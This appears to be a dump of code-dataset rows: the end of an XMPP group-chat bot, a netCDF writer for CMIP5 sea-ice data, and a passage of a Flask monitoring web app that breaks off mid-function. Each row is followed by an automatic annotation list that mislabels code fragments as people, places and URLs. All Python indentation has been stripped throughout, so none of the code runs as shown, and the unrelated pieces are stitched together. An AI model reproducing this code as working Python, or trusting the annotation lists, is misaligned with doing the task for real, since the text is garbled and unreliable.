@presence_stanza_handler('subscribe')
def handle_presence_subscribe(self, stanza):
logging.info('%s subscribe', stanza.from_jid)
sender = stanza.from_jid
bare = sender.bare()
# avoid repeated request
invited = False
if bare not in self.subscribes:
invited = self.invited.get(bare, False)
if invited is not False:
if invited == 2:
self.invited[bare] = 1
else:
del self.invited[bare]
return stanza.make_accept_response()
# We won't deny inivted members
self.handle_userjoin_before()
else:
if config.private and str(bare) != config.root:
self.send_message(sender, _('Sorry, this is a private group, and you are not invited.'))
return stanza.make_deny_response()
if not self.handle_userjoin_before():
return stanza.make_deny_response()
self.current_jid = sender
self.now = datetime.datetime.utcnow()
try:
self.handle_userjoin(action=stanza.stanza_type)
except ValidationError:
#The server is subscribing
pass
self.subscribes[bare] = True
if stanza.stanza_type.endswith('ed'):
return stanza.make_accept_response()
if invited is False:
presence = Presence(to_jid=stanza.from_jid.bare(),
stanza_type='subscribe')
return [stanza.make_accept_response(), presence]
@presence_stanza_handler('subscribed')
def handle_presence_subscribed(self, stanza):
# use the same function
logging.info('%s subscribed', stanza.from_jid)
return self.handle_presence_subscribe(stanza)
@presence_stanza_handler('unsubscribe')
def handle_presence_unsubscribe(self, stanza):
logging.info('%s unsubscribe', stanza.from_jid)
sender = stanza.from_jid
self.current_jid = sender
self.now = datetime.datetime.utcnow()
self.handle_userleave(action=stanza.stanza_type)
if stanza.stanza_type.endswith('ed'):
return stanza.make_accept_response()
presence = Presence(to_jid=stanza.from_jid.bare(),
stanza_type='unsubscribe')
return [stanza.make_accept_response(), presence]
@presence_stanza_handler('unsubscribed')
def handle_presence_unsubscribed(self, stanza):
# use the same function
logging.info('%s unsubscribed', stanza.from_jid)
return self.handle_presence_unsubscribe(stanza)
@presence_stanza_handler()
def handle_presence_available(self, stanza):
if stanza.stanza_type not in ('available', None):
return False
jid = stanza.from_jid
plainjid = str(jid.bare())
if plainjid == str(self.jid):
return
self.now = datetime.datetime.utcnow()
if plainjid not in self.presence:
type = 'new'
self.current_jid = jid
self.user_update_presence(plainjid)
if conn_lost_interval and self.current_user and self.current_user.last_seen and \
self.now - self.current_user.last_seen < conn_lost_interval:
type = 'reconnect'
self.send_lost_message()
logging.info('%s[%s] (%s)', jid, stanza.show or 'available', type)
if self.roster and jid.bare() not in self.roster:
presence = Presence(to_jid=jid.bare(), stanza_type='subscribe')
self.send(presence)
presence = Presence(to_jid=jid.bare(), stanza_type='subscribed')
self.send(presence)
else:
if jid.resource not in self.presence[plainjid]:
self.user_update_presence(plainjid)
logging.info('%s[%s]', jid, stanza.show or 'available')
self.presence[plainjid][jid.resource] = {
'show': stanza.show,
'status': stanza.status,
'priority': stanza.priority,
}
if self.get_user_by_jid(plainjid) is None:
try:
self.current_jid = jid
self.handle_userjoin()
except ValidationError:
#The server is subscribing
pass
if config.warnv105 and jid.resource and \
jid.resource.startswith('Talk.') and not jid.resource.startswith('Talk.v104'):
# Got a Talk.v107...
# No need to translate; GTalk only has a v105 for Chinese.
self.send_message(jid, '警告:你正在使用的可能是不加密的 GTalk v105 版本。网络上的其它人可能会截获您的消息。这样不安全!请使用 GTalk v104 英文版或者其它 XMPP 客户端。\nGTalk 英文版: http://www.google.com/talk/index.html\nPidgin: http://www.pidgin.im/')
return True
@presence_stanza_handler('unavailable')
def handle_presence_unavailable(self, stanza):
jid = stanza.from_jid
plainjid = str(jid.bare())
if plainjid in self.presence and plainjid != str(self.jid):
try:
del self.presence[plainjid][jid.resource]
except KeyError:
pass
if self.presence[plainjid]:
logging.info('%s[unavailable] (partly)', jid)
else:
del self.presence[plainjid]
self.now = datetime.datetime.utcnow()
self.user_disappeared(plainjid)
logging.info('%s[unavailable] (totally)', jid)
return True
@event_handler()
def handle_all(self, event):
'''Log all events.'''
logging.info('-- {0}'.format(event))
def get_name(self, jid):
if isinstance(jid, str):
jid = JID(jid)
else:
jid = jid.bare()
try:
return self.roster[jid].name or hashjid(jid)
except KeyError:
return hashjid(jid)
def get_vcard(self, jid=None, callback=None):
'''callback is used as both result handler and error handler'''
q = Iq(
to_jid = jid and jid.bare(),
stanza_type = 'get',
)
vc = ET.Element("{vcard-temp}vCard")
q.add_payload(vc)
if callback:
self.stanza_processor.set_response_handlers(q, callback, callback)
self.send(q)
def set_vcard(self, nick=None, avatar=None):
self.get_vcard(callback=partial(self._set_vcard, nick, avatar))
def _set_vcard(self, nick=None, avatar=None, stanza=None):
#FIXME: This doesn't seem to work with jabber.org
q = Iq(
from_jid = self.jid,
stanza_type = 'set',
)
vc = ET.Element("{vcard-temp}vCard")
if nick is not None:
n = ET.SubElement(vc, '{vcard-temp}FN')
n.text = nick
if avatar is not None:
type, picfile = avatar
photo = ET.SubElement(vc, '{vcard-temp}PHOTO')
t = ET.SubElement(photo, '{vcard-temp}TYPE')
t.text = type
d = ET.SubElement(photo, '{vcard-temp}BINVAL')
data = open(picfile, 'rb').read()
d.text = base64.b64encode(data).decode('ascii')
self.avatar_hash = hashlib.new('sha1', data).hexdigest()
q.add_payload(vc)
self.stanza_processor.set_response_handlers(
q, self._set_vcard_callback, self._set_vcard_callback)
self.send(q)
def _set_vcard_callback(self, stanza):
if stanza.stanza_type == 'error':
logging.error('failed to set my vCard.')
else:
logging.info('my vCard set.')
self.update_presence()
def update_presence(self):
#TODO: update for individual users
presence = self.settings['presence']
x = ET.Element('{vcard-temp:x:update}x')
if self.avatar_hash:
photo = ET.SubElement(x, '{vcard-temp:x:update}photo')
photo.text = self.avatar_hash
presence.add_payload(x)
self.send(presence)
def runit(settings, mysettings):
bot = ChatBot(JID(config.jid), settings, mysettings)
try:
bot.run()
# Connection resets
raise Exception
except SystemExit as e:
if e.code == CMD_RESTART:
# restart
bot.disconnect()
models.connection.disconnect()
try:
os.close(lock_fd[0])
except:
pass
logging.info('restart...')
os.execv(sys.executable, [sys.executable] + sys.argv)
except KeyboardInterrupt:
pass
finally:
ChatBot.message_queue = bot.message_queue
bot.disconnect()
def main():
gp = models.connection.Group.one()
if gp and gp.status:
st = gp.status
else:
st = None
settings = dict(
# deliver here even if the admin logs in
initial_presence = Presence(priority=30, status=st),
poll_interval = 3,
)
botsettings = {
'presence': settings['initial_presence'],
}
settings.update(config.settings)
settings = XMPPSettings(settings)
if config.trace:
logging.info('enabling trace')
for logger in ('pyxmpp2.IN', 'pyxmpp2.OUT'):
logger = logging.getLogger(logger)
logger.setLevel(logging.DEBUG)
for logger in (
'pyxmpp2.mainloop.base', 'pyxmpp2.expdict',
'pyxmpp2.mainloop.poll', 'pyxmpp2.mainloop.events',
'pyxmpp2.transport', 'pyxmpp2.mainloop.events',
):
logger = logging.getLogger(logger)
logger.setLevel(max((logging.INFO, config.logging_level)))
if config.logging_level > logging.DEBUG:
restart_if_failed(runit, 3, args=(settings, botsettings))
else:
runit(settings, botsettings)
if __name__ == '__main__':
setup_logging()
models.init()
main()
| 16,313 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2012'], ['PERSON', 'lilydjwg'], ['LOCATION', 'xmpptalk'], ['PERSON', 'Iq'], ['PERSON', 'self.presence = defaultdict(dict'], ['DATE_TIME', '2 more\n seconds'], ['LOCATION', 'nick'], ['NRP', 'avatar_type'], ['NRP', 'avatar_type'], ['PERSON', 'stanza.body'], ['PERSON', "logging.info('(server"], ['DATE_TIME', 'seconds'], ['LOCATION', 'ri'], ['LOCATION', 'del self.invited[bare'], ['PERSON', 'str(bare'], ['PERSON', 'plainjid = str(jid.bare'], ['PERSON', 'stanza.show'], ['PERSON', 'jid.resource'], ['PERSON', 'stanza.show'], ['PERSON', 'jid.resource'], ['NRP', 'Chinese'], ['PERSON', '版本。网络上的其它人可能会截获您的消息。这样不安全!请使用 GTalk'], ['PERSON', 'plainjid = str(jid.bare'], ['LOCATION', 'del self.presence[plainjid][jid.resource'], ['PERSON', 'jid = JID(jid'], ['LOCATION', 'nick'], ['LOCATION', 'self._set_vcard_callback'], ['PERSON', "settings['initial_presence"], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://www.google.com/talk/index.html\\nPidgin:'], ['URL', "http://www.pidgin.im/'"], ['URL', 'email.com'], ['URL', 'xml.et'], ['URL', 'pyxmpp2.me'], ['URL', 'pyxmpp2.pr'], ['URL', 'pyxmpp2.cl'], ['URL', 'pyxmpp2.se'], ['URL', 'pyxmpp2.ro'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.st'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.ext.ve'], ['URL', 'pyxmpp2.iq'], ['URL', 'config.co'], ['URL', 'self.re'], ['URL', 'self.cl'], ['URL', 'self.pr'], ['URL', 'self.su'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'self.client.co'], ['URL', 'self.client.jid.ba'], ['URL', 'logger.in'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'sender.st'], ['URL', 'self.client.st'], ['URL', 'self.client.ru'], ['URL', 'self.cl'], ['URL', 'self.client.ru'], ['URL', 'pyxmpp2.exceptions.St'], ['URL', 'self.me'], ['URL', 'self.no'], ['URL', 'self.cu'], ['URL', 'stanza.as'], ['URL', 'stanza.bo'], ['URL', 'self.me'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.si'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'self.cl'], ['URL', 'stanza.st'], ['URL', 'stanza.bo'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.se'], ['URL', 'stanza.fr'], ['URL', 'stanza.bo'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'logging.in'], ['URL', 'stanza.bo'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'logging.in'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.cu'], ['URL', 'self.client.stream.se'], ['URL', 'self.client.ma'], ['URL', 'loop.de'], ['URL', 'self.client.ro'], ['URL', 'self.ro'], ['URL', 'x.su'], ['URL', 'self.pr'], ['URL', 'logging.in'], ['URL', 'self.pr'], ['URL', 'self.se'], ['URL', 'self.client.ro'], ['URL', 'self.roster.va'], ['URL', 'ri.as'], ['URL', 'self.client.ro'], ['URL', 'client.re'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.fr'], ['URL', 'sender.ba'], ['URL', 'self.su'], ['URL', 'self.invited.ge'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'stanza.ma'], ['URL', 'config.pr'], ['URL', 'config.ro'], ['URL', 'self.se'], ['URL', 'stanza.ma'], ['URL', 'stanza.ma'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'stanza.st'], ['URL', 'self.su'], ['URL', 'stanza.st'], ['URL', 'stanza.ma'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'stanza.ma'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.fr'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'stanza.st'], ['URL', 'stanza.st'], ['URL', 'stanza.ma'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'stanza.ma'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.st'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'self.no'], ['URL', 'self.pr'], ['URL', 'self.cu'], ['URL', 'self.us'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'user.la'], ['URL', 'self.no'], ['URL', 'self.cu'], ['URL', 'user.la'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'stanza.sh'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'self.se'], ['URL', 'jid.ba'], ['URL', 'self.se'], ['URL', 'jid.re'], ['URL', 'self.pr'], ['URL', 'self.us'], ['URL', 'logging.in'], ['URL', 'stanza.sh'], ['URL', 'self.pr'], ['URL', 'jid.re'], ['URL', 'stanza.sh'], ['URL', 'stanza.st'], ['URL', 'stanza.pr'], ['URL', 'self.ge'], ['URL', 'self.cu'], ['URL', 'jid.re'], ['URL', 'jid.resource.st'], ['URL', 'jid.resource.st'], ['URL', 'self.se'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'jid.re'], ['URL', 'self.pr'], ['URL', 'logging.in'], ['URL', 'self.pr'], ['URL', 'self.no'], ['URL', 'self.us'], ['URL', 'logging.in'], ['URL', 'logging.in'], ['URL', 'jid.ba'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'q.ad'], ['URL', 'self.st'], ['URL', 'processor.se'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'jabber.org'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'hashlib.ne'], ['URL', 'q.ad'], ['URL', 'self.st'], ['URL', 'processor.se'], ['URL', 'self.se'], ['URL', 'stanza.st'], ['URL', 'logging.er'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'ET.Su'], ['URL', 'presence.ad'], ['URL', 'self.se'], ['URL', 'bot.ru'], ['URL', 'e.co'], ['URL', 'models.co'], ['URL', 'os.cl'], ['URL', 'logging.in'], ['URL', 'sys.ar'], ['URL', 'ChatBot.me'], ['URL', 'bot.me'], ['URL', 'models.connection.Gr'], ['URL', 'gp.st'], ['URL', 'gp.st'], ['URL', 'config.se'], ['URL', 'config.tr'], ['URL', 'logging.in'], ['URL', 'pyxmpp2.IN'], ['URL', 'logging.ge'], ['URL', 'logger.se'], ['URL', 'logging.DE'], ['URL', 'pyxmpp2.mainloop.ba'], ['URL', 'pyxmpp2.ma'], ['URL', 'pyxmpp2.ma'], ['URL', 'pyxmpp2.tr'], ['URL', 'pyxmpp2.ma'], ['URL', 'logging.ge'], ['URL', 'logger.se'], ['URL', 'logging.IN'], ['URL', 'logging.DE'], ['URL', 'models.in']] |
30 | from datetime import datetime, timedelta
from netCDF4 import Dataset
from netCDF4 import num2date
import numpy as np
import time
import os
__author__ = 'Trond Kristiansen'
__email__ = dummy@email.com'
__created__ = datetime(2014, 1, 23)
__modified__ = datetime(2014, 1, 23)
__version__ = "0.1"
__status__ = "Development"
def help ():
"""
This function generates a netCDF4 file and saves the runnings average values for
specific years into file for each IPCC AR5 model.
Used to gether with extractIce.py
"""
def writeCMIP5File(modelName,scenario,myvarname,lon,lat,time,mydata,mydataanomaly,outfilename):
myformat='NETCDF3_CLASSIC'
if os.path.exists(outfilename):
os.remove(outfilename)
print "Results written to netcdf file: %s"%(outfilename)
if myvarname=="sic": myvar="SIC"
f1 = Dataset(outfilename, mode='w', format=myformat)
f1.title = "IPCC AR5 %s"%(myvar)
f1.description = "IPCC AR5 running averages of %s for model %s for scenario %s"%(myvar,modelName,scenario)
f1.history = "Created " + str(datetime.now())
f1.source = "Trond Kristiansen (dummy@email.com)"
f1.type = "File in NetCDF3 format created using iceExtract.py"
f1.Conventions = "CF-1.0"
"""Define dimensions"""
f1.createDimension('x', len(lon))
f1.createDimension('y', len(lat))
f1.createDimension('time', None)
vnc = f1.createVariable('longitude', 'd', ('x',),zlib=False)
vnc.long_name = 'Longitude'
vnc.units = 'degree_east'
vnc.standard_name = 'longitude'
vnc[:] = lon
vnc = f1.createVariable('latitude', 'd', ('y',),zlib=False)
vnc.long_name = 'Latitude'
vnc.units = 'degree_north'
vnc.standard_name = 'latitude'
vnc[:] = lat
v_time = f1.createVariable('time', 'd', ('time',),zlib=False)
v_time.long_name = 'Years'
v_time.units = 'Years'
v_time.field = 'time, scalar, series'
v_time[:]=time
v_temp=f1.createVariable('SIC', 'd', ('time', 'y', 'x',),zlib=False)
v_temp.long_name = "Sea-ice area fraction (%)"
v_temp.units = "%"
v_temp.time = "time"
v_temp.field="SIC, scalar, series"
v_temp.missing_value = 1e20
if myvarname=='sic':
f1.variables['SIC'][:,:,:] = mydata
f1.close()
| 2,388 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', "Trond Kristiansen'"], ['DATE_TIME', 'years'], ['PERSON', 'lat'], ['PERSON', 'mydata'], ['LOCATION', 'mydataanomaly'], ['LOCATION', 'outfilename'], ['PERSON', 'netcdf'], ['PERSON', 'myformat'], ['PERSON', 'f1.source'], ['PERSON', 'Trond Kristiansen'], ['PERSON', "f1.createDimension('x"], ['DATE_TIME', "'Years'"], ['DATE_TIME', "'Years'"], ['PERSON', 'mydata\n \n f1.close'], ['URL', 'email.com'], ['URL', 'extractIce.py'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'f1.de'], ['URL', 'datetime.no'], ['URL', 'f1.so'], ['URL', 'email.com'], ['URL', 'iceExtract.py'], ['URL', 'f1.Co'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'vnc.st'], ['URL', 'f1.cr'], ['URL', 'vnc.st'], ['URL', 'f1.cr'], ['URL', 'time.fi'], ['URL', 'f1.cr'], ['URL', 'temp.fi'], ['URL', 'f1.va'], ['URL', 'f1.cl']] |
31 | # =================================================================
#
# Authors: Tom Kralidis dummy@email.com
# Just van den Broecke dummy@email.com
#
# Copyright (c) 2014 Tom Kralidis
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import base64
import csv
import json
import logging
from io import StringIO
from flask import (abort, flash, g, jsonify, redirect,
render_template, request, url_for)
from flask_babel import gettext
from flask_login import (LoginManager, login_user, logout_user,
current_user, login_required)
from flask_migrate import Migrate
from itertools import chain
import views
from __init__ import __version__
from enums import RESOURCE_TYPES
from factory import Factory
from init import App
from models import Resource, Run, ProbeVars, CheckVars, Tag, User, Recipient
from resourceauth import ResourceAuth
from util import send_email, geocode, format_checked_datetime, \
format_run_status, format_obj_value
# Module globals for convenience
LOGGER = logging.getLogger(__name__)
APP = App.get_app()
CONFIG = App.get_config()
DB = App.get_db()
BABEL = App.get_babel()
MIGRATE = Migrate(APP, DB)
LOGIN_MANAGER = LoginManager()
LOGIN_MANAGER.init_app(APP)
LANGUAGES = (
('en', 'English'),
('fr', 'Français'),
('de', 'German'),
('nl_NL', 'Nederlands (Nederland)'),
('es_BO', 'Español (Bolivia)'),
('hr_HR', 'Croatian (Croatia)')
)
# Should GHC Runner be run within GHC webapp?
if CONFIG['GHC_RUNNER_IN_WEBAPP'] is True:
LOGGER.info('Running GHC Scheduler in WebApp')
from scheduler import start_schedule
# Start scheduler
start_schedule()
else:
LOGGER.info('NOT Running GHC Scheduler in WebApp')
# commit or rollback shorthand
def db_commit():
err = None
try:
DB.session.commit()
except Exception:
DB.session.rollback()
# finally:
# DB.session.close()
return err
@APP.before_request
def before_request():
g.user = current_user
if request.args and 'lang' in request.args and request.args['lang'] != '':
g.current_lang = request.args['lang']
if not hasattr(g, 'current_lang'):
g.current_lang = 'en'
if CONFIG['GHC_REQUIRE_WEBAPP_AUTH'] is True:
# Login is required to access GHC Webapp.
# We need to pass-through static resources like CSS.
if any(['/static/' in request.path,
request.path.endswith('.ico'),
g.user.is_authenticated(), # This is from Flask-Login
(request.endpoint is not None
and getattr(APP.view_functions[request.endpoint],
'is_public', False))]):
return # Access granted
else:
return redirect(url_for('login'))
# Marks (endpoint-) function as always to be accessible
# (used for GHC_REQUIRE_WEBAPP_AUTH)
def public_route(decorated_function):
decorated_function.is_public = True
return decorated_function
@APP.teardown_appcontext
def shutdown_session(exception=None):
DB.session.remove()
@BABEL.localeselector
def get_locale():
return g.get('current_lang', 'en')
# return request.accept_languages.best_match(LANGUAGES.keys())
@LOGIN_MANAGER.user_loader
def load_user(identifier):
return User.query.get(int(identifier))
@LOGIN_MANAGER.unauthorized_handler
def unauthorized_callback():
if request.query_string:
url = '%s%s?%s' % (request.script_root, request.path,
request.query_string)
else:
url = '%s%s' % (request.script_root, request.path)
return redirect(url_for('login', lang=g.current_lang, next=url))
@LOGIN_MANAGER.request_loader
def load_user_from_request(request):
# Try to login using Basic Auth
# Inspiration: https://flask-login.readthedocs.io
# /en/latest/#custom-login-using-request-loader
basic_auth_val = request.headers.get('Authorization')
if basic_auth_val:
basic_auth_val = basic_auth_val.replace('Basic ', '', 1)
authenticated = False
try:
username, password = base64.b64decode(basic_auth_val).split(':')
user = User.query.filter_by(username=username).first()
if user:
authenticated = user.authenticate(password)
finally:
# Ignore errors, they should all fail the auth attempt
pass
if not authenticated:
LOGGER.warning('Unauthorized access for user=%s' % username)
abort(401)
else:
return user
# TODO: may add login via api-key or token here
# finally, return None if both methods did not login the user
return None
@APP.template_filter('cssize_reliability')
def cssize_reliability(value, css_type=None):
"""returns CSS button class snippet based on score"""
number = int(value)
if CONFIG['GHC_RELIABILITY_MATRIX']['red']['min'] <= number <= \
CONFIG['GHC_RELIABILITY_MATRIX']['red']['max']:
score = 'danger'
panel = 'red'
elif (CONFIG['GHC_RELIABILITY_MATRIX']['orange']['min'] <= number <=
CONFIG['GHC_RELIABILITY_MATRIX']['orange']['max']):
score = 'warning'
panel = 'yellow'
elif (CONFIG['GHC_RELIABILITY_MATRIX']['green']['min'] <= number <=
CONFIG['GHC_RELIABILITY_MATRIX']['green']['max']):
score = 'success'
panel = 'green'
else: # should never really get here
score = 'info'
panel = 'blue'
if css_type is not None and css_type == 'panel':
return panel
else:
return score
@APP.template_filter('cssize_reliability2')
def cssize_reliability2(value):
"""returns CSS panel class snippet based on score"""
return cssize_reliability(value, 'panel')
@APP.template_filter('round2')
def round2(value):
"""rounds a number to 2 decimal places except for values of 0 or 100"""
if value in [0.0, 100.0]:
return int(value)
return round(value, 2)
@APP.context_processor
def context_processors():
"""global context processors for templates"""
rtc = views.get_resource_types_counts()
tags = views.get_tag_counts()
return {
'app_version': __version__,
'resource_types': RESOURCE_TYPES,
'resource_types_counts': rtc['counts'],
'resources_total': rtc['total'],
'languages': LANGUAGES,
'tags': tags,
'tagnames': list(tags.keys())
}
@APP.route('/')
def home():
"""homepage"""
response = views.get_health_summary()
return render_template('home.html', response=response)
@APP.route('/csv', endpoint='csv')
@APP.route('/json', endpoint='json')
def export():
"""export resource list as JSON"""
resource_type = None
if request.args.get('resource_type') in RESOURCE_TYPES.keys():
resource_type = request.args['resource_type']
query = request.args.get('q')
response = views.list_resources(resource_type, query)
if request.url_rule.rule == '/json':
json_dict = {'total': response['total'], 'resources': []}
for r in response['resources']:
try:
ghc_url = '%s/resource/%s' % \
(CONFIG['GHC_SITE_URL'], r.identifier)
last_run_report = '-'
if r.last_run:
last_run_report = r.last_run.report
json_dict['resources'].append({
'resource_type': r.resource_type,
'title': r.title,
'url': r.url,
'ghc_url': ghc_url,
'ghc_json': '%s/json' % ghc_url,
'ghc_csv': '%s/csv' % ghc_url,
'first_run': format_checked_datetime(r.first_run),
'last_run': format_checked_datetime(r.last_run),
'status': format_run_status(r.last_run),
'min_response_time': round(r.min_response_time, 2),
'average_response_time': round(r.average_response_time, 2),
'max_response_time': round(r.max_response_time, 2),
'reliability': round(r.reliability, 2),
'last_report': format_obj_value(last_run_report)
})
except Exception as e:
LOGGER.warning(
'JSON error resource id=%d: %s' % (r.identifier, str(e)))
return jsonify(json_dict)
elif request.url_rule.rule == '/csv':
output = StringIO()
writer = csv.writer(output)
header = [
'resource_type', 'title', 'url', 'ghc_url', 'ghc_json', 'ghc_csv',
'first_run', 'last_run', 'status', 'min_response_time',
'average_response_time', 'max_response_time', 'reliability'
]
writer.writerow(header)
for r in response['resources']:
try:
ghc_url = '%s%s' % (CONFIG['GHC_SITE_URL'],
url_for('get_resource_by_id',
identifier=r.identifier))
writer.writerow([
r.resource_type,
r.title,
r.url,
ghc_url,
'%s/json' % ghc_url,
'%s/csv' % ghc_url,
format_checked_datetime(r.first_run),
format_checked_datetime(r.last_run),
format_run_status(r.last_run),
round(r.min_response_time, 2),
round(r.average_response_time, 2),
round(r.max_response_time, 2),
round(r.reliability, 2)
])
except Exception as e:
LOGGER.warning(
'CSV error resource id=%d: %s' % (r.identifier, str(e)))
return output.getvalue(), 200, {'Content-type': 'text/csv'}
@APP.route('/opensearch')
def opensearch():
"""generate OpenSearch description document"""
content = render_template('opensearch_description.xml')
return content, 200, {'Content-type': 'text/xml'}
@APP.route('/resource/<identifier>/csv', endpoint='csv-resource')
@APP.route('/resource/<identifier>/json', endpoint='json-resource')
def export_resource(identifier):
"""export resource as JSON or CSV"""
resource = views.get_resource_by_id(identifier)
history_csv = '%s/resource/%s/history/csv' % (CONFIG['GHC_SITE_URL'],
resource.identifier)
history_json = '%s/resource/%s/history/json' % (CONFIG['GHC_SITE_URL'],
resource.identifier)
if 'json' in request.url_rule.rule:
last_run_report = '-'
if resource.last_run:
last_run_report = resource.last_run.report
json_dict = {
'identifier': resource.identifier,
'title': resource.title,
'url': resource.url,
'resource_type': resource.resource_type,
'owner': resource.owner.username,
'min_response_time': resource.min_response_time,
'average_response_time': resource.average_response_time,
'max_response_time': resource.max_response_time,
'reliability': resource.reliability,
'status': format_run_status(resource.last_run),
'first_run': format_checked_datetime(resource.first_run),
'last_run': format_checked_datetime(resource.last_run),
'history_csv': history_csv,
'history_json': history_json,
'last_report': format_obj_value(last_run_report)
}
return jsonify(json_dict)
elif 'csv' in request.url_rule.rule:
output = StringIO()
writer = csv.writer(output)
header = [
'identifier', 'title', 'url', 'resource_type', 'owner',
'min_response_time', 'average_response_time', 'max_response_time',
'reliability', 'status', 'first_run', 'last_run', 'history_csv',
'history_json'
]
writer.writerow(header)
writer.writerow([
resource.identifier,
resource.title,
resource.url,
resource.resource_type,
resource.owner.username,
resource.min_response_time,
resource.average_response_time,
resource.max_response_time,
resource.reliability,
format_run_status(resource.last_run),
format_checked_datetime(resource.first_run),
format_checked_datetime(resource.last_run),
history_csv,
history_json
])
return output.getvalue(), 200, {'Content-type': 'text/csv'}
@APP.route('/resource/<identifier>/history/csv',
endpoint='csv-resource-history')
@APP.route('/resource/<identifier>/history/json',
endpoint='json-resource-history')
def export_resource_history(identifier):
"""export resource history as JSON or CSV"""
resource = views.get_resource_by_id(identifier)
if 'json' in request.url_rule.rule:
json_dict = {'runs': []}
for run in resource.runs:
json_dict['runs'].append({
'owner': resource.owner.username,
'resource_type': resource.resource_type,
'checked_datetime': format_checked_datetime(run),
'title': resource.title,
'url': resource.url,
'response_time': round(run.response_time, 2),
'status': format_run_status(run)
})
return jsonify(json_dict)
elif 'csv' in request.url_rule.rule:
output = StringIO()
writer = csv.writer(output)
header = [
'owner', 'resource_type', 'checked_datetime', 'title', 'url',
'response_time', 'status'
]
writer.writerow(header)
for run in resource.runs:
writer.writerow([
resource.owner.username,
resource.resource_type,
format_checked_datetime(run),
resource.title,
resource.url,
round(run.response_time, 2),
format_run_status(run),
])
return output.getvalue(), 200, {'Content-type': 'text/csv'}
@APP.route('/settings')
def settings():
"""settings"""
pass
@APP.route('/resources')
def resources():
"""lists resources with optional filter"""
resource_type = None
if request.args.get('resource_type') in RESOURCE_TYPES.keys():
resource_type = request.args['resource_type']
tag = request.args.get('tag')
query = request.args.get('q')
response = views.list_resources(resource_type, query, tag)
return render_template('resources.html', response=response)
@APP.route('/resource/<identifier>')
def get_resource_by_id(identifier):
"""show resource"""
response = views.get_resource_by_id(identifier)
return render_template('resource.html', resource=response)
@APP.route('/register', methods=['GET', 'POST'])
def register():
"""register a new user"""
if not CONFIG['GHC_SELF_REGISTER']:
msg1 = gettext('This site is not configured for self-registration')
msg2 = gettext('Please contact')
msg = '%s. %s %s' % (msg1, msg2,
CONFIG['GHC_ADMIN_EMAIL'])
flash('%s' % msg, 'danger')
return render_template('register.html', errmsg=msg)
if request.method == 'GET':
return render_template('register.html')
# Check for existing user or email
user = User.query.filter_by(username=request.form['username']).first()
email = User.query.filter_by(email=request.form['email']).first()
if user or email:
flash('%s' % gettext('Invalid username or email'), 'danger')
return render_template('register.html')
user = User(request.form['username'],
request.form['password'], request.form['email'])
DB.session.add(user)
try:
DB.session.commit()
except Exception as err:
DB.session.rollback()
bad_column = err.message.split()[2]
bad_value = request.form[bad_column]
msg = gettext('already registered')
flash('%s %s %s' % (bad_column, bad_value, msg), 'danger')
return redirect(url_for('register', lang=g.current_lang))
return redirect(url_for('login', lang=g.current_lang))
@APP.route('/add', methods=['GET', 'POST'])
@login_required
def add():
"""add resource"""
if not g.user.is_authenticated():
